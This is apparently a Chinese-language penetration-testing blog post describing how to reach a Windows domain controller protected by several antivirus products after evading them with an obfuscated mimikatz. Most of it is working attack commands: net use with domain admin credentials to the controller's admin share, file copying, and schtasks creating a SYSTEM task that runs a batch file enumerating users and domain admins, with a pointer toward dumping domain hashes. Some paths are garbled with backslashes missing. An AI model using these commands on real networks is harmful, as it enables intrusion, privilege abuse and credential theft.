- 当前被控机器存在MS 诺顿,本来想直接利用出网机器 CS做个免杀然后一把梭,奈何域控环境有些苛刻:多个国际杀软 不出网,故而才有此文
前言
环境
- Microsoft Windows Server 2016 Standard
- Microsoft Security Essentials Norton Kaspersky
- Psexec 、WMIHACKER等都利用失败
对mimikatz进行免杀后抓取出网机器中的明文及Hash信息,恰好域管曾登录过这台机器,利用抓取到的域管信息去连接域控机器。
尽可能的减少动作,对psexec、WMIHACKER等常见方式进行利用发现均失败
故而使用被遗忘的技能
net use及schtasks计划任务组合
测试过程
建立连接
net use \192.168.42.8 /u:xsgcsadministrator xsgcs
查看目标开放的共享
net view \192.168.42.8
只有域控才会有下面两个共享目录:
代码语言:javascript复制NETLOGON Disk Logon server share
SYSVOL Disk Logon server sharedir 命令
dir \192.168.42.8c$
删除连接
net use \192.168.42.8 /del /y
copy 命令
- 将当前目录下的1.txt文件拷贝到域控机器
copy 1.txt \192.168.42.8c$
- 将域控机器上的xsgcs.txt拷贝到本地
copy \192.168.42.8c$xsgcs.txt
type 命令
- 查看xsgcs.txt文件内容
type \192.168.42.8c$xsgcs.txt
计划任务执行命令 高版本中at命令不适用
- 创建计划任务名为xsgcs
schtasks /create /tn xsgcs /U xsgcsadministrator /P xsgcs /tr C:Userssystem.bat /sc ONSTART /s 192.168.42.8 /RU system - 执行计划任务xsgcs
schtasks /run /tn xsgcs /s 192.168.42.8 /U xsgcsadministrator /P xsgcs - 删除计划任务xsgcs
schtasks /F /delete /tn xsgcs /s 192.168.42.8 /U xsgcsadministrator /P xsgcs - system.bat内容
此处举例说明
whoami >> c:Users1.txt
net user >> c:Users1.txt
systeminfo >> c:Users1.txt
tasklist /svc >> c:Users1.txt
net group "domain admins" /domain >> c:Users1.txt
net user /domain >> c:Users1.txt也可进行自定义,将计划任务写入system.bat中执行
最后再按照我之前写的利用ProxyShell漏洞获取域控所有Hash文章里面导出域控hash的方式将命令替换到bat文件里面即可。
备注:
1.上传的任何文件都需要在前面添加绝对路径
2.如果当前路径无权限可尝试更换其他路径
